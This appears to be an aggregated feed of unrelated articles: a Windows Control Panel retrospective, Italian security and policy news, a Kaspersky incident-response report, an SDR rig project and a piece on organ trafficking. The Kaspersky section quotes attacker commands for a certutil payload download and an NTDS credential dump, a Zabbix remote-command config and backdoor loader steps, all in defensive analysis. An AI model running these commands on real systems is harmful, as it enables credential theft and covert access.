Once the nerve center of Windows operating systems, the Control Panel and its multitude of applets has its roots in the earliest versions of Windows. From here users could use these configuration applets to control and adjust just about anything in a friendly graphical environment. Despite the lack of any significant criticism from users and with many generations having grown up with its familiar dialogs, it has over the past years been gradually phased out by the monolithic Universal Windows Platform (UWP) based Settings app.

Whereas the Windows control panel features an overview of the various applets – each of which uses Win32 GUI elements like tabs to organize settings – the Settings app is more Web-like, with lots of touch-friendly whitespace, a single navigable menu, kilometers of settings to scroll through and absolutely no way to keep more than one view open at the same time.

Unsurprisingly, this change has not been met with a lot of enthusiasm by the average Windows user, and with Microsoft now officially recommending users migrate over to the Settings app, it seems that before long we may have to say farewell to what used to be an intrinsic part of the Windows operating system since its first iterations. Yet bizarrely, much of the Control Panel functionality doesn’t exist yet in the Settings app, and it remain an open question how much of it can be translated into the Settings app user experience (UX) paradigm at all.

Considering how unusual this kind of control panel used to be beyond quaint touch-centric platforms like Android and iOS, what is Microsoft’s goal here? Have discovered a UX secret that has eluded every other OS developer?

A Simple Concept

The Windows 3.1 Control Panel (1992). (Source: ToastyTech.com)
Settings which a user may want to tweak on their computer system range from hardware devices and networks to the display resolution and wallpaper, so it makes sense to put all of these configuration options within an easy to reach and use location. Generally this has meant something akin to a folder containing various clickable icons and accompanying text which together make clear what settings can be configured by opening it. In addition, the same setting dialogs can be accessed using context-sensitive menus, such as when right-clicking on the desktop.
The Windows 98 Control Panel. (Source: ToastyTech.com)
It’s little wonder that for the longest time operating systems have settled for this approach, as it is intuitive, and individual items can have stylized icons that make it even more obvious what settings can be configured by clicking on it, such a keyboard, a mouse, a display, etc. As graphical fidelity increased, so did the styling of these icons, with MacOS, Windows, BeOS and the various desktop environments for OSs like the Linuxes and BSDs all developing their own highly skeuomorphic styles to make their UIs more intuitive and also more pleasant to look at. A good overview of the Windows Control Panel evolution can be found over at the Version Museum website.
The Windows XP Control Panel in ‘Classic’ view. (2001) (Source: suffieldacademy.org)
Coming from the still somewhat subdued style of Windows XP after years of Windows 9x and Windows NT/2000, Windows Vista and Windows 7 cranked this style up to eleven with the Windows Aero design language. This meant glass, color, translucency, depth and high-fidelity icons that made the function of the Control Panel’s individual entries more obvious than ever, creating a masterpiece that would be very hard to beat. The user was also given two different ways to view the Control Panel: the simplified category-based view, or the ‘classic’ view with all icons (and folders for e.g. Administrative Tools) visible in one view.
Windows 7 Control Panel (2009) in category view. (Source: techrepublic.com)
Meanwhile Apple did much the same thing, leaning heavily into their unique design language not only for its desktop, but ultimately also for its mobile offerings. Everything was pseudo-3D, with vivid colors adorning detailed renderings of various physical items and so on, creating a true feast for the eyes when taking in these lush UIs, with efficient access to settings via clearly marked tabs and similar UI elements.
The Mac OS X Panther System Preferences in 2003. (Source: Gadget Unity TV)
This way of organizing system settings was effectively replicated across a multitude of environments, with operating systems like Haiku (based on BeOS) and ReactOS (re-implementing Windows) retaining those classical elements of the original. A truly cross-platform, mostly intuitive experience was created, and Bliss truly came to the computing world.

Naturally, something so good had no right to keep existing, ergo it had to go.

The World Is Flat

The first to make the big change was Microsoft, with the release of Windows 8 and its Metro design language. This new visual style relied on simple shapes, with little to no adornments or distractions (i.e. more than a single color). Initially Microsoft also reckoned that Windows users wanted every window to be full-screen, and that hot edges and sides rather than a task bar and start menu was the way to go, as every single system running Windows 8 would obviously have a touch screen. Fortunately they did backtrack on this, but their attempt to redesign the Control Panel into something more Metro-like with the Settings app did persist, like an odd growth somewhere on a body part.
Windows 8’s PC Settings app (2012). (Source: softpedia.com)
Although the Control Panel remained in Windows 8 as well, the course had been set. Over time this small lump developed into the Settings app in Windows 10, by which time Metro had been renamed into the Microsoft Design Language (MDL), which got a recent tweak in what is now called the Fluent Design Language (FDL) for Windows 11.

Central to this is the removal of almost all colors, the use of text labels over icons where possible (though simple monochrome icons are okay) and only rectangles with no decorations. This also meant no folder-centric model for settings but rather all the items put into a text-based menu on the left-hand side and an endless scroll-of-doom on the right side containing sparsely distributed settings.

This led to the absolutely beautifully dystopian Settings app as it exists in Windows 10:
The Settings app in Windows 10 back in ~2015. Hope you don’t like colors.
All of this came as skeuomorphic designs were suddenly considered ‘passé’, and the new hotness was so-called Flat Design. Google’s Material Design as developed in 2014 is another good example of this, with the characteristic ‘flat UI elements adrift in a void’ aesthetic that has now been adopted by Microsoft, and a few years ago by Apple as well starting in 2022 with MacOS Ventura’s System Settings (replacing System Preferences).
Monterey’s General system preferences (left) are different from Ventura’s General system settings (right). (Credit: MacWorld)
Rather than a tabbed interface to provide a clear overview, everything is now a blind hierarchy of menu items to scroll through and activate to access sub-, sub-sub-, and sub-sub-sub- items, and inevitably realize a few times that you’re in the wrong section. But rather than being able to click that other, correct tab, you now get to navigate back multiple views, one click at a time.

It isn’t just Windows and Apple either, but many of the big desktop environments like Gnome have also moved to this Flat Design Language. While various reasons have been provided for these changes, it’s undeniable that FDL makes a UI less intuitive (because there’s less useful visual information) and makes for a worse user experience (UX) with worse ergonomics as a result (because of the extra scrolling and clicking). This is especially obvious in the ‘independent applets’ versus ‘monolithic settings app’ comparison.

One-Track Mind

Imagine that you’re trying out a couple new wallpapers in Windows while keeping an eye on Windows Update’s latest shenanigans. You then need to quickly adjust the default audio device or another small adjustment unrelated to any of these other tasks. If you are using Windows 7 or earlier with the Control Panel applets, this is normal behavior and exceedingly common especially during hardware troubleshooting sessions.

If you’re using the Settings app, this is impossible, as only view can be active at a given time. You think you’re smart and right-click the desktop for ‘Personalize desktop’ so that the other Settings view stays intact? This is not how it works, as the Settings app is monolithic and now shifts to the newly selected view. Currently this is not too noticeable yet as many applets still exist in Windows 10 and 11, but as more and more of these are assimilated into the Settings app, such events will become more and more common.

It would seem that after decades of UI and UX evolution, we have now reached a definite point where UX is only getting worse, arguably around the release of Windows 8. With color banished, anything even remotely pseudo-3D frowned upon and UIs based around touch interfaces, there will soon be no difference between using a desktop PC, tablet or smartphone. Just in the worst way possible, as nobody has ever written about the amazing ergonomics and efficient UX of the latter two devices.

Perhaps our only hope may lie with the OSes and desktop environments that keep things real and stick to decades of proven UX design rather than give into Fad Driven Development.

Rest in peace, Windows Control Panel. We hope to see you again soon in ReactOS.

hackaday.com/2024/09/03/a-wind…

I ricercatori di sicurezza hanno scoperto otto nuove vulnerabilità nelle versioni macOS delle applicazioni Microsoft (Outlook, Teams, Word, Excel, PowerPoint e OneNote), che, se sfruttate, consentono agli aggressori di aumentare i diritti e ottenere l’accesso a dati riservati.

Secondo una descrizione di Cisco Talos, i difetti identificati aiutano a bypassare le impostazioni sulla privacy nel sistema operativo, che sono basate sul framework TCC (Trasparenza, Consenso e Controllo).

“Se un aggressore sfrutta le vulnerabilità scoperte, potrà ottenere tutti i diritti concessi da Microsoft sulle applicazioni interessate”, scrivono gli esperti .

“Ad esempio, un utente malintenzionato potrebbe inviare e-mail dall’account della vittima, nonché registrare audio e video, senza alcuna interazione con l’utente preso di mira.” hanno aggiunto.

In teoria, un utente malintenzionato può inserire librerie dannose in una qualsiasi di queste applicazioni, cosa che gli permetterà non solo di ottenere i diritti di quest’ultima, ma anche di estrarre una serie di dati riservati. Come notano gli esperti, per uno sfruttamento efficace l’aggressore deve già avere un certo accesso al sistema della vittima.

TCC e protezione dei dati

TCC applica una politica che richiede alle applicazioni di ottenere il consenso esplicito dell’utente prima di poter accedere a risorse protette quali contatti, calendari, foto e posizione, garantendo che gli utenti mantengano il controllo diretto sulle proprie informazioni personali e sull’accessibilità dei propri dati alle applicazioni.

TCC opera congiuntamente agli entitlement, che sono un set di capacità richieste per la funzionalità di un’app. Gli sviluppatori scelgono questi entitlement da una selezione fornita da Apple e, sebbene solo un sottoinsieme di tutti i possibili entitlement sia disponibile per l’uso generale, i più potenti sono riservati esclusivamente alle applicazioni e ai binari di sistema di Apple.

Quando un’applicazione con diritti specifici richiede inizialmente l’utilizzo di una specifica funzionalità, viene visualizzato un pop-up di autorizzazione.

L’immagine sopra mostra un esempio di tale richiesta di autorizzazione: “Malevolent App” vorrebbe accedere alla telecamera. L’utente deve decidere se consentire o negare l’accesso alla telecamera. Questa decisione viene quindi registrata nel database TCC.

Una volta che l’utente ha fatto la sua scelta, qualsiasi futura richiesta relativa alla telecamera da parte della “Malevolent App” sarà regolata dalla decisione registrata nel database. Questo sistema consente effettivamente agli utenti di controllare ed essere informati delle azioni sensibili alla privacy che un’applicazione intende eseguire. La necessaria interazione dell’utente è ciò che consente agli utenti di impedire alle applicazioni dannose di eseguire azioni sensibili come la registrazione di un video o lo scatto di foto.

Un utente può successivamente verificare questa autorizzazione nella sezione “Privacy e sicurezza” delle “Impostazioni di sistema” di macOS. Lì, è possibile trovare un elenco di autorizzazioni, tra cui Fotocamera, Microfono e Servizi di localizzazione.

L'articolo Le App Microsoft su macOS possono essere utilizzate per accedere ai dati riservati dell’Utente proviene da il blog della sicurezza informatica.

Da un sondaggio globale commissionato da Kaspersky Lab è emerso che il 41% delle aziende ha un disperato bisogno di specialisti della sicurezza informatica. Gli esperti in minacce alla sicurezza informatica e gli specialisti nell’analisi del malware sono i più richiesti (39% ciascuno).

C’è anche una carenza di analisti SOC (35%), specialisti di pentest e sicurezza di rete (33%) e analisti di Threat Intelligence (32%). Se suddivisa per settore, la carenza di personale addetto alla sicurezza informatica è più avvertita nel settore pubblico, dove quasi la metà dei posti vacanti non viene occupata (46%).

Al secondo posto in questa classifica si trovano telecomunicazioni e media (39%), al terzo posto vendita al dettaglio e sanità (37% ciascuno). L’area della sicurezza informatica è meglio coperta nel settore IT e finanziario (rispettivamente 31 e 27%).

L’indagine, condotta da Grand View Research in 29 paesi, ha coinvolto 1.012 rappresentanti aziendali che ricoprono varie posizioni: manager (IT, SOC), principali specialisti, esperti di sicurezza informatica.

“Vediamo una forte domanda, in particolare, di ingegneri per l’implementazione della sicurezza informatica e analisti SOC, nonché di specialisti nello sviluppo della sicurezza”, ha affermato Vladislav Galimov, capo del gruppo di reclutamento per la sicurezza informatica di Kaspersky.

“Inoltre, crediamo che nel prossimo futuro inizierà a crescere la necessità di esperti nel campo dell’intelligenza artificiale e della sicurezza delle reti neurali”. Risultati simili sono stati ottenuti da uno studio simile sul mercato del lavoro nel campo della sicurezza informatica , condotto da Angara Security .

Secondo il fornitore di servizi, lo scorso anno il numero dei posti vacanti nel settore della sicurezza informatica è aumentato del 27%.

Secondo gli esperti, la crescente carenza di personale addetto alla sicurezza informatica è direttamente collegata al percorso generale verso la digitalizzazione dell’economia e all’inasprimento dei requisiti normativi in ​​materia di sicurezza di fronte all’aumento del numero e della complessità degli attacchi informatici .

L'articolo Esperti di sicurezza? Siete i più richiesti! Nella PA, il 46% delle posizioni in Cybersecurity è vacante proviene da il blog della sicurezza informatica.

As early as tomorrow morning, a majority of EU governments could endorse the controversial draft law on chat control, which had been removed from the agenda in June after massive protests. According to a report by the news service Contexte, the new Hungarian Council Presidency intends to achieve a majority with a small twist, namely removing the searching for unknown material using „artificial intelligence“ (as requested by the Netherlands). The exact details of the Hungarian proposal are kept secret. But the proposal is still to require bulk automated searches in and disclosure of private chats, including end-to-end encrypted chats, that might contain illegal photos or videos. If a user opt out of this “upload moderation” of their chats, they would be blocked from receiving or sending any images, videos and URLs. Signal and Threema have announced they would end their services in the EU if forced to implement the proposed automated monitoring (so-called “client-side scanning”).

Former Pirate Party Member of the European Parliament Patrick Breyer is now calling on EU citizens to turn to their governments: “In June, under massive public pressure, there was a fragile blocking minority to save our digital privacy of correspondence and secure encryption. But now, with no spotlight on government dealings, minimal concessions could tip the scales. Europeans need to understand that they will be cut off from using commonplace secure messengers if chat control is adopted – that means losing touch with your friends and colleagues around the world. Do you really want Europe to become the world leader in bugging our smartphones and requiring blanket surveillance of the chats of millions of law-abiding Europeans?“

Breyer describes the proposal to restrict chat controls to supposedly ‘known’ illegal content as window-dressing: “Regardless of the objective – imagine the postal service simply opened and snooped through every letter without suspicion. It’s inconceivable. Besides, it is precisely the current bulk screening for supposedly known content by Big Tech that exposes thousands of entirely legal private chats, overburdens law enforcement and mass criminalises minors.

The European Parliament is convinced that this Orwellian approach will betray children and victims by inevitably failing in court. It calls for truly effective child protection by mandating security by design, proactive crawling to clean the web and removal of illegal content – none of which is contained in the government proposal on the table now. We have one day to make our governments take a different approach of effective and rights-respecting protection while saving our privacy and security online!”

Breyer’s info portal on chat control: chatcontrol.eu

patrick-breyer.de/en/chat-cont…

In 2023, Kaspersky’s Global Emergency Response Team (GERT) participated in services around the world that allowed our experts to gain insight into various threats and techniques used by APT groups, common crimeware and, in some cases, internal adversaries. As we highlighted in our annual report, the most prominent threat in 2023 was ransomware, and the Government vertical was the sector that most frequently requested digital forensics, incident response and malware analysis (DFIRMA) services. While file encryption was the most common threat last year, this post proposes a deep dive into specific cases that caught our attention and were mentioned during our annual DFIRMA report webinar.

The insider fraud attack

A group of collaborators at a government organization identified an internal service that allowed the creation of legitimate transactions that weren’t direct money transfers, but could result in monetary losses for the organization. These losses could reach millions of dollars.

The following scenario (not related to a specific customer) could be considered an example of such misuse of an internal service:

A bank only allows a customer to open a maximum of two bank accounts for free, with the customer paying a fee to open additional accounts. However, the adversary used the internal system to create multiple bank accounts for individual customers, who avoided paying the required fees in exchange for a payment to the adversary. As a result of this incident, the organization reported a loss of more than $20 million.

Many logs related to the application in question, as well as VPN access and network activity, were requested for analysis and the employees involved in the fraudulent activity were identified. Two different cases were analyzed in which the abuse of transaction configuration was confirmed, one by exploiting a vulnerability in a debugging interface and the other by misusing privileges in a valid account.

In the first case, GERT identified a misconfiguration that was abused by the adversaries to steal cookies from other users to impersonate them and their activity. An application on one of the analyzed systems registered exception logging details that included cookies for the user that encountered the exception, allowing us to determine the user involved.

In the other case, one of the users modified the privileges and details of another user, impersonating that user to create additional transactions in the internal service and attempting to hide the original details. Later, this newly modified user accessed the VPN from a previously known system where another user was accessing the transaction system for what was initially catalogued as legitimate activity, but which was recently confirmed to be part of the malicious activity.

Most of the criminal activity was performed by accessing the infrastructure through the VPN, but it was discovered that a new user was accessing the transaction system from the internal network using the same unauthorized behavior.

The results of the GERT team’s analysis confirmed the collusion of a user involved in the transaction requests and managed to identify the sources and link the user activity to various systems involved in the investigation, including local and remote IDs. This information was used by the customer in a timely manner to take legal action against the insider employee and his accomplices.

Mitre ATT&CK techniques

Flax Typhoon/SLIME13 APT attack

After enabling Kaspersky Managed Detection and Response (MDR) in a customer’s infrastructure, our platforms detected the presence of well-known software installed on the customer’s premises without their knowledge.

Although these applications were legitimate, attackers used them to gain persistent access to the victim’s environment.

In September 2023, Kaspersky MDR detected a suspicious service on a corporate host. The adversaries used a technique that mimicked the real system application name conhost.exe, but the service was started from a non-standard folder. GERT’s analysis confirmed that the application wasn’t a system service, but was instead associated with SoftEther VPN, a legitimate multi-protocol VPN software.

The supposed conhost application was downloaded to the system by a legitimate local user using the well-known Windows LOLBin certutil, and then installed via command line as a system service:
certutil.exe -urlcache -split -f hxxp://<Public IP>/conhost.exe
Another suspicious service masquerading as wshelper.dll was observed on another host. This DLL was associated with Zabbix agent, which is typically deployed on a monitoring target to actively monitor local resources and applications.

Analysis of the sample confirmed that the configuration file was set to allow remote commands, taking advantage of passive and active checks enabled by Zabbix.
EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432
Port 5432 was configured in a firewall rule to allow listening, with the “smart” name PGSQL to make it look legitimate.

GERT’s analysis confirmed that the intrusion lasted more than two years. In the early stages of the attack, an NTDS dump was created using system commands:
cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test" q q
c:\windows\sysvol\domain\ntds\active directory\ntds.dit"
During those two years of intrusion, security controls detected and contained multiple attempts to execute pentesting applications such as Mimikatz and CobaltStrike, but all the repurposed legitimate software remained invisible until the customer decided to implement our MDR solution. GERT analysis confirmed that the infrastructure had been compromised since mid-2021. The artifacts and TTPs of the attackers are similar to those used by the Flax Typhoon APT group, which employs minimal malware and custom payloads, but relies heavily on legitimate applications instead.

Mitre ATT&CK techniques

The MFA lack of control

After enabling multi-factor authentication (MFA) for its “critical employees”, a financial company was targeted by a spear-phishing attack.

The phishing attack spoofed the popular DocuSign platform and was directed at a specific group of employees. Although the company detected the phishing attack and configured rules to avoid receiving similar emails, some users received and opened the malicious email.

Among those who unwittingly opened the link was one of the protected users. The attackers were able to take control of his account thanks to the implementation of a phishing kit configured to automatically steal the MFA tokens.

The initial phishing attack occurred on October 6, 2023, and GERT analysts confirmed that one of the targeted users opened the malicious email the same day, which was followed by new connections opened from different locations outside the company’s headquarters. The attackers also configured additional MFA devices to access the target user’s mailbox contents without being noticed and without tampering with the original mailbox.

The attackers accessed the contents of the mailbox for a few days, allowing them to understand internal processes and prepare a BEC attack.

One month after the initial access, the attackers compromised a privileged email account (where MFA was not enabled). This new account had privileges in Microsoft 365, which allowed new rules and parameters to be configured. The attackers configured “send as” privileges on behalf of critical users, such as money transfer approvers and requesters. The adversaries also used this account to configure forwarding rules to hide messages received from a specific bank and from specific users.

Once the necessary privileges and rules were configured, the attackers sent a new email request using a legitimate template previously used in the company to request money transfers and attached documents collected from the original compromised account, but with a different destination bank account, requesting an international transfer of more than $300,000.

Upon receiving the request, the bank processed the transfer as usual based on the legitimate source and attached documents.

A notification was sent to the customer from an email address belonging to the bank, confirming the transfer. However, this email address wasn’t listed in the attackers’ forwarding rules, so the message was delivered to the customer’s mailbox. After receiving this message, the customer decided to investigate the user responsible for the privileged mail account.

GERT’s analysis confirmed the initial attack date and vector, the compromised users, and all the techniques used by the threat actors, and provided a set of recommendations for protecting and monitoring cloud assets. By analyzing user access logs (UAL) and additional cloud logs, as well as firewall logs and the client’s own system logs, GERT was able to provide a complete timeline detailing all the techniques used by the fraudsters.

Mitre ATT&CK techniques

ToddyCat-like APT attack with an ICMP backdoor

Kaspersky’s Managed and Detection Response service (MDR) was alerted to suspicious activity on domain controllers and Exchange servers.

GERT was contacted to investigate the case; our analysis confirmed SMB abuse and IKEEXT service exploitation, as well as exploitation of the Microsoft Exchange server remote code execution vulnerability (CVE-2021-26855).

One interesting finding was the use of IKEEXT for persistence. The vulnerability used by the attackers, along with the exploit for it, was first published by High-Tech Bridge Security Research Lab in 2012. It was associated with the wlbsctrl.dll library and originally used for privilege escalation. Shortly after the exploit was published, Microsoft patched the vulnerability. However, our analysts confirmed that the same library is now being used as a persistence mechanism for malware.

IKEEXT is a default service on Windows. It is invoked by the svchost process, which loads ikeext.dll, the DLL responsible for the IKEEXT service.

The ikeext.dll library, in turn, is responsible for loading a DLL named wlbsctrl.dll, which is default Windows behavior. However, while the svchost service always runs on the system, wlbsctrl.dll does not exist in the file system by default, and this where threat actors saw an opportunity.

The threat actors created a malicious version of wlbsctrl.dll and saved it on the system. Based on Windows behavior, this DLL was executed every time without requiring registration in Autorun, which is commonly used for persistence.

Besides persistence, in the investigated incident the threat actor used the IKEEXT vulnerability to perform lateral movement via the SMB protocol and created a custom firewall rule named DLL Surrogate that permits dllhost.exe to listen on custom port 52415. All this was achieved by placing the backdoored wlbsctrl.dll into the system32 folder where the legitimate library is normally stored (if present on the system).

Later, the attacker implemented an ICMP backdoor. Once the backdoor was identified, Kaspersky verified and detected two more in-the-wild samples outside the customer’s infrastructure. All the discovered samples were similar except for the following points:

• Some differences in the PE header (normal behavior between similar samples);
• Different mutex strings, all located at the same raw file offset;
• Different bytes at the raw file offset 0x452–0x483, which are apparently useless (non-actionable) code.

Based on GERT’s analysis, the backdoor acted like a loader, configured to execute the following activities:

• Check for the mutex; if it already exists in memory, terminate the process.
• Attempt to read the file %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; decrypt its contents using the AES algorithm with a hardcoded KEY and a KEY derived from the volume serial number (VSN) of the C drive, then use it to set the value of the registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, and then delete the file.
• Load the contents of the default value of registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, decrypt it again with AES using the same KEY described above, and invoke the payload shellcode.
• Allocate the shellcode size in a new segment and jump to it.

Note: The calculated REGKEY NAME (Interface {<calculated_for_each_host>}) is based on the VSN of the C drive (without host VSN it is not possible to decrypt correctly).

As part of the analysis, GERT identified a payload stored in the Windows registry and analyzed it, confirming the following behavior in the encrypted payload.

The decrypted payload has the header “CAFEBABE” (hex bytes magic related to Java Class files) followed by the shellcode size and finally the data. This payload executes the following commands:

1. Decrypt itself (for the third time);
2. If not running under exe, create a suspended dllhost process with the parameter “/Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235}”, which refers to a COM+ system application service;
3. Allocate space to the new process;
4. Write a section of the decrypted payload (starting at offset 0x1A03, and having a size that’s contained in the small header at offset 0x19FF) into the new allocation;
5. Patch dllhost (in memory only) to ensure execution at the newly allocated space;
6. Resume the dllhost process.

A new instance of the shellcode starts from step one. It finds that it is actually running under dllhost, decrypts a new section, executes it and listens on port 52415. The final payload injected into dllhost.exe appears to create a raw ICMP socket with no port. No outbound connection is made (although the received payload likely communicates outbound). Data is received from an unknown source in a Base64-encoded ICMP packet, converted to binary, decrypted, and executed via direct execution of data (allocating space using the VirtualAlloc function), copying shellcode to the allocated space, making a direct call to the allocated space.

According to our threat intelligence platforms, this threat has similarities to APT attacks: the attack Tactics, Techniques and Procedures (TTP) used are very similar to the ToddyCat actor, but there’s no solid attribution to this group.

The objective of the threat actor was to gain persistence for monitoring and future impact, but no other objectives were confirmed based on the evidence obtained.

Mitre ATT&CK techniques

Conclusions

Although statistics show the government sector was the most targeted vertical last year, it is clear that threat and crimeware actors do not care which vertical their potential targets belong to. To stay ahead of the attackers, the best course of action is to assess your asset inventory and continue to monitor and protect it.

The trend of cyberattacks and intrusions making use of infrastructure assets or legitimate on-premises applications creates the need to enable additional layers of monitoring based on threat intelligence. The implementation of MDR has been one of the recurring triggers for new investigations thanks to its detection capabilities and the ability of analysts to determine timely courses of action.

To learn more about our Incident Response report, we invite you to view the recording of the webinar “Analyzing last year’s cyber incident cases”.

securelist.com/incident-respon…

With as cheap and versatile as RTL-SDR devices are, it’s a good idea to have a couple of them on hand for some rainy day hacking. In fact, depending on what signals you’re trying to sniff out of the air, you may need multiple interfaces anyway. Once you’ve amassed this arsenal of software defined radios, you may find yourself needing a way to transport and deploy them. Luckily, [Jay Doscher] has you covered.

His latest creation, the SDR SOLO, is a modular system for mounting RTL-SDRs. Each dongle is encased in its own 3D printed frame, which not only protects it, but makes it easy to attach to the base unit. To keep the notoriously toasty radios cool, each frame has been designed to maximize airflow. You can even mount a pair of 80 mm fans to the bottom of the stack to really get the air moving. The current design is based around the RTL-SDR Blog V4, but could easily be adapted to your dongle of choice.

In addition to the row of SDR dongles, the rig also includes a powered USB hub. Each radio connects to the hub via a short USB cable, which means that you’ll only need a single USB cable running back to your computer. There’s also various mounts and adapters for attaching antennas to the system. Stick it all on the end of a tripod, and you’ve got a mobile radio monitoring system that’ll be the envy of the hackerspace.

As we’ve come to expect, [Jay] put a lot of thought and effort into the CAD side of this project. Largely made of 3D printed components, his projects often feature a rugged and professional look that really stands out.

hackaday.com/2024/09/03/portab…

“Ogni mio nuovo lavoro rappresenta la summa e la sintesi di tutti quelli realizzati prima, evolvendone nuovamente il significato e la portata artistica. Credo che “Strategia Esoterica” abbia comunque una forza molto superiore perché frutto di una trasmutazione molto potente”- Deca @Musica Agorà

iyezine.com/deca-strategia-eso…

Deca - Strategia esoterica

Deca - Strategia esoterica - “Ogni mio nuovo lavoro rappresenta la summa e la sintesi di tutti quelli realizzati prima, evolvendone nuovamente il significato e la portata artistica.

^{Massimo Argo (In Your Eyes ezine)}

Il traffico umano per rimozione di organi è una forma di sfruttamento in cui le vittime, spesso vulnerabili, sono ingannate o costrette a donare organi.Le vittime sono spesso sfruttate e la loro "consenso" è invalido a causa di inganno o abuso di vulnerabilità.
La domanda è alimentata dalla carenza globale di organi per trapianti etici. Con meno del 10% della domanda globale soddisfatta, molti pazienti disperati si rivolgono a mezzi illegali. Questo crea un mercato lucrativo per il traffico di organi, calcolato per un importo compreso tra 840 milioni e 1,7 miliardi di dollari all'anno.
I reni e parti di fegato sono gli organi più frequentemente prelevati.
I trafficanti di organi operano all'interno di reti globali complesse e organizzate, richiedendo un'infrastruttura sofisticata che coinvolge specialisti medici e coordinamento logistico. Utilizzano pubblicità locali, social media e approcci diretti da parte di reclutatori, spesso ex vittime o persone fidate nella comunità. Queste reti sono flessibili e possono funzionare come unità mobili o gruppi specializzati.
Le vittime tipiche del traffico di organi per rimozione provengono da contesti poveri, non istruiti e vulnerabili. Gruppi criminali organizzati mirano specificamente a individui disoccupati, migranti, richiedenti asilo e rifugiati. Molti di loro sono costretti, ingannati o vedono la vendita di organi come ultima risorsa per migliorare la loro situazione.
Le conseguenze per le vittime includono gravi problemi di salute.
L'UNODC, l’Ufficio delle Nazioni Unite per il controllo della droga e crimine (United Nations Office on Drugs and Crime) è un'agenzia delle Nazioni Unite fondata nel 1997 con sede a Vienna, sta lavorando per migliorare le risposte legali e di giustizia a questo crimine. Lo ha fatto anche attraverso una serie di pubblicazioni (unodc.org/unodc/en/human-traff…), tra le quali - di maggior interesse per la cooperazione internazionale di polizia - quella riferita al Toolkit on the Investigation and Prosecution of Trafficking in Persons for Organ Removal (unodc.org/res/human-traffickin…)

Secondo la Dichiarazione di Istanbul sul Traffico di Organi e sul Turismo del Trapianto (declarationofistanbul.org/imag…) , le definizioni chiave relative al traffico di organi includono:

1. Traffico di organi: attività illecite che coinvolgono la rimozione e il commercio di organi umani, spesso attraverso coercizione o inganno.
2. Turismo di trapianto: viaggio di pazienti verso paesi dove le leggi sul trapianto sono meno rigorose, per ricevere organi in modo non etico.
3. Commercialismo del trapianto: pratica di compensare finanziariamente i donatori di organi, violando i principi di donazione volontaria e non remunerata.

Queste definizioni mirano a guidare le politiche e le pratiche nel campo della donazione e del trapianto di organi.
Lo scopo principale del traffico di organi, secondo il Protocollo delle Nazioni Unite, è lo sfruttamento di donatori vulnerabili per il profitto finanziario derivante dalla rimozione e dal trapianto illegale di organi. Questo crimine è considerato una forma di sfruttamento e violazione dei diritti umani, mirata a trarre vantaggio da persone in situazioni di vulnerabilità. Il protocollo mira a prevenire e punire tali pratiche, proteggendo i diritti delle vittime.
Le conseguenze legali per le persone coinvolte nel traffico di organi possono includere pene detentive per reati come la rimozione illegale di organi, la sollecitazione di donatori o riceventi, e l'offerta di vantaggi indebiti a funzionari sanitari. Inoltre, possono essere perseguiti per reati di complicità, tentativo di traffico e pubblicità di organi a scopo di lucro. Le sanzioni variano a seconda della legislazione nazionale, ma possono comportare anche multe significative e la confisca dei beni ottenuti illecitamente.
Gli stati possono ritenere responsabili i destinatari di organi trafficati in base alla legislazione nazionale che attua la Convenzione contro il Traffico di Persone, che prevede la responsabilità per chi utilizza i servizi di una vittima di traffico, sapendo della sua condizione. Inoltre, gli stati sono obbligati a criminalizzare la partecipazione e l'organizzazione di atti di traffico di organi, estendendo la responsabilità anche a persone giuridiche. Tuttavia, la decisione di perseguire i destinatari degli organi è complessa, poiché spesso si trovano in situazioni disperate.

#UNODC #TRAFFICODIORGANI